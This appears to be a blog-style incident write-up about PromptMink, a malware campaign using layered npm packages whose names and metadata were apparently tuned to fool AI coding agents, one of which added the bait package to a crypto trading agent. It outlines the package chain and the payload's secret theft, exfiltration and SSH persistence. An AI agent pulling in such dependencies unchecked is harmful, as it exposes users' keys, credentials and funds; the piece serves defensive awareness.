Open-source supply-chain attacks used to depend on tricking a human maintainer. PromptMink showed a newer route: make a malicious package look useful to an AI coding agent, then wait for the agent to add it to a real project.

On April 29, 2026, ReversingLabs published research on a malware campaign it named PromptMink. The campaign centered on npm packages that presented themselves as ordinary Web3 developer tooling. One package, @validate-sdk/v2, claimed to provide validation, hashing, encoding, decoding, and random-generation utilities. In reality, ReversingLabs said it stole secrets from the host environment.

The package did not have to persuade every developer directly. It sat behind a more plausible first-layer package, @solana-launchpad/sdk, which looked like a Solana development dependency. That first-layer package was then used by openpaw-graveyard, an npm package for an autonomous crypto trading agent. ReversingLabs traced the dependency addition to a February 28, 2026 source commit that was co-authored by Anthropic's Claude Opus.

That is the failure worth putting in the graveyard. This was not merely a story about malware authors using generative AI to write malware. It was a story about AI-assisted development accepting a package into a crypto agent without catching that the package chain led to an infostealer.

The Package Chain

ReversingLabs described PromptMink as a layered campaign. The first layer consisted of useful-looking crypto packages with names such as @solana-launchpad/sdk, @meme-sdk/trade, and @validate-ethereum-address/core. Those packages could appear relevant to Web3 coding tasks and were padded with familiar dependencies. The second layer contained the payload packages, including @validate-sdk/v2, which performed the malicious work.

That split mattered. If a disposable payload package was detected and removed, the attackers could publish a replacement and update the first-layer package without rebuilding the trust of the bait package from scratch. It also made the package easier for an automated coding assistant to accept. The AI saw a project needing Solana or crypto-launchpad functionality. It saw a package whose name and README fit the task. It did not behave like a skeptical software engineer doing dependency review.

According to ReversingLabs, the malicious code scanned environments for secrets, targeted .env and JSON files, exfiltrated sensitive material, and evolved over time. Earlier versions used obfuscated JavaScript. Later versions bundled Node executables and then Rust-compiled Node add-ons. The payload expanded from file theft to SSH persistence and project source-code exfiltration.

In a crypto trading agent, that is an especially bad place for the trust failure to land. Environment variables can include wallet keys, API keys, exchange credentials, database credentials, and tokens for services that touch money.

The Agentic Failure

The traditional secure-development answer to dependency risk is boring but effective: inspect new dependencies, check who publishes them, understand their transitive dependencies, run package scanners, and avoid adding new packages when a few lines of local code would do. That discipline gets weaker when the person steering the work is prompting an AI agent rather than reading every diff.

AI coding agents are optimized to make the project compile and satisfy the stated task. A package with the right name, convincing metadata, and exported functions that line up with the prompt can look like a solution. That creates a new supply-chain incentive for attackers: write packages for the agent, not for the human.

ReversingLabs made that point directly. The campaign appeared to use package names, descriptions, and layered dependencies that were effective at deceiving automated coding assistants. The Hacker News, summarizing the research, reported that ReversingLabs linked the campaign to North Korea's Famous Chollima and said the actor was using AI-generated code and layered packaging to deceive coding agents more effectively than human developers.

That is a different shape of dependency confusion. The package does not need to beat a careful maintainer. It only needs to beat the local probability model and the rushed approval loop around it.

The Vibe Coding Risk

Vibe coding is often sold as a way to move faster by letting the model handle implementation details. Dependency selection is one of those details. A non-specialist user asks for a feature. The agent decides what library to install. The project starts working. The pull request looks productive. The hidden cost is that the user may not know enough to challenge the dependency choice.

PromptMink is a clean example of why that trust model is brittle. In a hand-built project, a developer adding a crypto dependency might ask why it exists, who maintains it, why it needs a second-layer validation SDK, and what the package runs at install or import time. In an AI-built project, the new dependency can look like implementation noise.

The failure also scales. If one agent learns that a package name is useful for a task, many agents can repeat that choice. If the package metadata is tuned for AI consumption, the recommendation loop becomes part of the attack surface. The malware author no longer has to win search-engine optimization for humans. They can win package-selection optimization for agents.

Why It Belongs Here

The scope line is narrow: this is not a graveyard entry merely because a malicious actor used AI. The entry belongs here because the vulnerable software was an autonomous trading agent whose dependency graph was changed through AI-assisted development, and the harmful result was a malicious package in a real software supply chain.

The human mistake was trusting the agent to pick and add dependencies in a high-risk financial context. The agent mistake was treating a plausible package as a safe package. The attacker advantage was knowing that automated coding systems can be fooled by surface-level relevance.

For developers, the lesson is plain: AI-generated dependency additions need the same review as human-written ones, and probably more. In crypto, infrastructure, healthcare, and any software with secrets in its environment, "the agent added a library" should be treated as a security event until proven otherwise.

PromptMink did not require a novel exploit in the trading agent itself. The exploit was the development workflow. A package looked useful, an agent pulled it in, and the software crossed from fast to compromised.